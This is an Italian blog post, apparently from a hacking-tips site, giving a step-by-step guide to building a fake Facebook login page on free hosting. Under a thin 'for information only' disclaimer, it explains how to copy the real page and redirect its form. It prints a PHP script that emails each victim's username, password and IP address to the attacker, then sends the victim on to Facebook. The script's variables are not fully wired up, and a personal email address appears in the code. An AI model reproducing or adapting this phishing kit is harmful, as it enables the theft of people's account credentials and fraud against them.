Salve gente!Oggi impareremo un altro metodo usato dagli hacker per rubarci le nostre password di facebook ma anche di altro,ma ricordatevi che è solo a scopo informativo e io vi sconsiglio seriamente di provarci.
.: Il fake login :.Come si capisce dal nome,questa tecnica consiste nel ricreare la pagina di login di un servizio (facebook,twitter,ecc ecc) quasi uguale a quella vera,solo che…trattiene le password.
.:
Cosa serve all’hacker per realizzare un fake login? :.-Internet;
-Un servizio di hosting,tipo altervista (ma dopo qualche giorno ti scoprono e bloccano il fake login);
-I file giusti;
-Questa guida;
.: Parte 1 - Creare un sito per ospitare il fake login :.L’hacker si registrerà ad esempio ad altervista
http://it.altervista.org/ e cliccherà su crea sito ecc.ecc.Quando ha finito,andrà al pannello di controllo
http://it.altervista.org/cplogin.php e,dopo aver effettuato il login,cliccherà sull’ icona grande “gestione file”.
.: Parte 2 - I file giusti (se l’hacker è nuovo,li scaricherà ad esempio da qui ) :.Se l’hacker ha già scaricato i file può saltare questo passaggio
Ora l’hacker ha già un sito dove mandare le sue vittime,ma non ha i file per rubargli la password.Ma per un hacker questa è una sciocchezza,infatti gli basta andare alla pagina che vuole duplicare (
in questo caso facebook) ,e poi salvarla:
-Se ha chrome clicca sulle tre linette in alto a destra della barra degli indirizi e sceglie “salva pagina con nome”;
-Se ha il buon vecchio internet explorer clicca su “file” e poi salva con nome (questo cambia a seconda della versione di internet explorer);
-Se ha mozilla firefox clicca sulla scritta arancione “firefox” in alto a sinistra e poi mette ”salva pagina con nome” (anche questo dipende dalla versione di firefox);
Ora che l’hacker ha tutti i file,deve modificarli per i suoi scopi. Quindi,andrà dove ha salvato la pagina con estensione .htm o .html (nomepagina.html) ,cliccherà sulla pagina con il tasto destro>apri con>blocco note.
Poi cliccherà su modifica>trova e cercherà:
action=”https://www.facebook.com/login.php?login_attempt=1″
che andrà a sostituire con:
action=”log.php”
Ecco fatto! Il fake login è quasi pronto!
Ora l'hacker creerà un file php su altervista che chiamerà log;Dentro inserira questo codice:
HTML
<?
///////////////////////////////////
$yourmail = “matteocarrara4@gmail.com”; //Inserisci qui il tuo indirizzo di posta
///////////////////////////////////
if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
$useragent=$_SERVER['HTTP_USER_AGENT'];
$td = date(“F jS”);
$date = date(“d M Y”);
$time = date(“g:i a”);
$LogTime = trim(” Date: “.$date.”, Time: “.$time);
mail(“$yourmail”, “Account $account”, “Username: $email \nPassword: $pass \n\nIndirizzo IP: $ip \nData log: $LogTime \nSystem Info: $useragent \n\nDarthLord\nwww.msn.com”,”from: $account <$account>”);
header( “Location: http://x.facebook.com/”);
?>
Ovviamente inserirà la propia email fra ”
HTML
“ $yourmail = “[color=orange]matteocarrara4@gmail.com[/color]“; //Inserisci qui il tuo indirizzo di posta
.: Il fake login: caricamento su internet (questo vale anche se avete scaricato i file) :.Ora l’hacker andrà a gestione file su altervista,e cliccherà il bottone grigio in alto “invia files”. Allora caricherà:
-Pagina di login modificata;
-Il file log.php;
(per chi ha scaricato lo zip,troverà questi file già pronti
deve solo modificare solo il file php e inserire la propia email)
In pratica tutto quello che ha modificato/creato leggendo questa guida.
.: Cosa succede quando qualcuno va sul fake login dell’hacker? :.1-L’utente vede la normale pagina di login di facebook (che in realtà avete modificato);
2-L’utente inserisce nome utente e password,che verranno registrati;
3-L’utente clicca “accedi”;
4-Viene reindirizzato alla pagina di login di facebook versione touch;
5-Rifà il login;
.: E l’hacker dove vede le password che ha rubato? :.Gli vengono recapitate direttamente per email
Che comodità eh?
Ripeto, questa guida è solo a scopo informativo.
Io e CrazyHackWorld non ci assiumiamo nessuna responsabilità.